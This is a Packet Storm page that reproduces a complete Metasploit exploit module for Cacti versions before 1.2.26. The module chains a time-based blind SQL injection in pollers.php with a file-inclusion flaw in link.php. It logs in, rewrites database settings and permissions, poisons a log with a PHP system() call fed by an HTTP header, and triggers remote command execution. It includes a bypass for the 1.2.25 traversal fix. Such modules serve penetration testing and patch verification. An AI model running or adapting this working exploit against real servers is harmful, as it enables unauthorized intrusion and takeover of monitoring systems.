exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cacti pollers.php SQL Injection / Remote Code Execution

Cacti pollers.php SQL Injection / Remote Code Execution
Posted Feb 5, 2024
Authored by Christophe de la Fuente, Aleksey Solovev | Site metasploit.com

This Metasploit exploit module leverages sql injection and local file inclusion vulnerabilities in Cacti versions prior to 1.2.26 to achieve remote code execution. Authentication is needed and the account must have access to the vulnerable PHP script (pollers.php). This is granted by setting the Sites/Devices/Data permission in the General Administration section.

tags | exploit, remote, local, php, vulnerability, code execution, sql injection, file inclusion
advisories | CVE-2023-49084, CVE-2023-49085
SHA-256 | b4ef67908324e2b53eac068bc36847b4c86d487875706d6d2339e053cc3970f0

Cacti pollers.php SQL Injection / Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

class CactiError < StandardError; end
class CactiNotFoundError < CactiError; end
class CactiVersionNotFoundError < CactiError; end
class CactiNoAccessError < CactiError; end
class CactiCsrfNotFoundError < CactiError; end
class CactiLoginError < CactiError; end

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cacti RCE via SQLi in pollers.php',
'Description' => %q{
This exploit module leverages a SQLi (CVE-2023-49085) and a LFI
(CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to
achieve RCE. Authentication is needed and the account must have access
to the vulnerable PHP script (`pollers.php`). This is granted by
setting the `Sites/Devices/Data` permission in the `General
Administration` section.
},
'License' => MSF_LICENSE,
'Author' => [
'Aleksey Solovev', # Initial research and discovery
'Christophe De La Fuente' # Metasploit module
],
'References' => [
[ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi
[ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE)
[ 'CVE', '2023-49085'], # SQLi
[ 'CVE', '2023-49084'] # LFI (RCE)
],
'Platform' => ['unix linux win'],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Targets' => [
[
'Linux Command',
{
'Arch' => ARCH_CMD,
'Platform' => [ 'unix', 'linux' ]
}
],
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Platform' => 'win'
}
]
],
'DefaultOptions' => {
'SqliDelay' => 3
},
'DisclosureDate' => '2023-12-20',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)

register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),
OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])
]
)
end

def sqli
@sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload|
sqli_final_payload = '"'
sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and')
sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=\""
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'pollers.php'),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' => {
'__csrf_magic' => @csrf_token,
'name' => 'Main Poller',
'hostname' => 'localhost',
'timezone' => '',
'notes' => '',
'processes' => '1',
'threads' => '1',
'id' => '2',
'save_component_poller' => '1',
'action' => 'save',
'dbhost' => sqli_final_payload
},
'vars_get' => {
'header' => 'false'
}
)
end
end

def get_version(html)
# This will return an empty string if there is no match
version_str = html.xpath('//div[@class="versionInfo"]').text
unless version_str.include?('The Cacti Group')
raise CactiNotFoundError, 'The web server is not running Cacti'
end
unless version_str.match(/Version (?<version>\d{1,2}\.\d{1,2}.\d{1,2})/)
raise CactiVersionNotFoundError, 'Could not detect the version'
end

Regexp.last_match[:version]
end

def get_csrf_token(html)
html.xpath('//form/input[@name="__csrf_magic"]/@value').text
end

def do_login
if @csrf_token.blank? || @cacti_version.blank?
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'keep_cookies' => true
)
if res.nil?
raise CactiNoAccessError, 'Could not access `index.php` - no response'
end

html = res.get_html_document
if @csrf_token.blank?
print_status('Getting the CSRF token to login')
@csrf_token = get_csrf_token(html)
if @csrf_token.empty?
# raise an error since without the CSRF token, we cannot login
raise CactiCsrfNotFoundError, 'Cannot get the CSRF token'
else
vprint_good("CSRF token: #{@csrf_token}")
end
end

if @cacti_version.blank?
print_status('Getting the version')
begin
@cacti_version = get_version(html)
vprint_good("Version: #{@cacti_version}")
rescue CactiError => e
# We can still log in without the version
print_bad("Could not get the version, the exploit might fail: #{e}")
end
end
end

print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`")
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' => {
'__csrf_magic' => @csrf_token,
'action' => 'login',
'login_username' => datastore['USERNAME'],
'login_password' => datastore['PASSWORD']
}
)
raise CactiNoAccessError, 'Could not login - no response' if res.nil?
raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302

print_good('Logged in')
end

def check
# Step 1 - Check if the target is Cacti and get the version
print_status('Checking Cacti version')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'keep_cookies' => true
)
return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?

html = res.get_html_document
begin
@cacti_version = get_version(html)
version_msg = "The web server is running Cacti version #{@cacti_version}"
rescue CactiNotFoundError => e
return CheckCode::Safe(e.message)
rescue CactiVersionNotFoundError => e
return CheckCode::Unknown(e.message)
end

if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26')
print_good(version_msg)
else
return CheckCode::Safe(version_msg)
end

# Step 2 - Login
@csrf_token = get_csrf_token(html)
return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?

begin
do_login
rescue CactiError => e
return CheckCode::Unknown("Login failed: #{e}")
end

@logged_in = true

# Step 3 - Check if the user has enough permissions to reach `pollers.php`
print_status('Checking permissions to access `pollers.php`')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'pollers.php'),
'method' => 'GET',
'keep_cookies' => true,
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
}
)
return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?
return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401
return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200

# Step 4 - Check if it is vulnerable to SQLi
print_status('Attempting SQLi to check if the target is vulnerable')
return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable

CheckCode::Vulnerable
end

def get_ext_link_id
# Get an unused External Link ID with a time-based SQLi
@ext_link_id = rand(1000..9999)
loop do
_res, elapsed_time = Rex::Stopwatch.elapsed_time do
sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")
end
break if elapsed_time < datastore['SqliDelay']

@ext_link_id = rand(1000..9999)
end
vprint_good("Got external link ID #{@ext_link_id}")
end

def exploit
# `#do_login` will take care of populating `@csrf_token` and `@cacti_version`
unless @logged_in
begin
do_login
rescue CactiError => e
fail_with(Failure::NoAccess, "Login failure: #{e}")
end
end

@log_file_path = "log/cacti#{rand(1..999)}.log"
print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")
@log_setting_name_bak = '_path_cactilog'
sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")
@do_settings_cleanup = true
sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")
register_file_for_cleanup(@log_file_path)

print_status("Inserting the log file path `#{@log_file_path}` to the external links table")
log_file_path_lfi = "../../#{@log_file_path}"
# Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):
# $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);
log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')
get_ext_link_id
sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")
@do_ext_link_cleanup = true

print_status('Getting the user ID and setting permissions (it might take a few minutes)')
user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")
fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)
sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")
@do_perms_cleanup = true

print_status('Logging in again to apply new settings and permissions')
# Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.
# This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.
cookie_jar_bak = cookie_jar.clone
cookie_jar.clear
csrf_token_bak = @csrf_token
# Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token
@csrf_token = nil
begin
do_login
rescue CactiError => e
fail_with(Failure::NoAccess, "Login failure: #{e}")
end

print_status('Poisoning the log')
header_name = rand_text_alpha(1).upcase
sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")

print_status('Triggering the payload')
# Expecting no response
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'link.php'),
'method' => 'GET',
'keep_cookies' => true,
'headers' => {
header_name => payload.encoded
},
'vars_get' => {
'id' => @ext_link_id,
'headercontent' => 'true'
}
}, 0)

# Restore the cookie_jar and the CSRF token to run cleanup without being blocked
cookie_jar.clear
self.cookie_jar = cookie_jar_bak
@csrf_token = csrf_token_bak
end

def cleanup
super

if @do_ext_link_cleanup
print_status('Cleaning up external link using SQLi')
sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")
end

if @do_perms_cleanup
print_status('Cleaning up permissions using SQLi')
sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")
end

if @do_settings_cleanup
print_status('Cleaning up the log path in `settings` table using SQLi')
sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")
sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")
end
end
end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close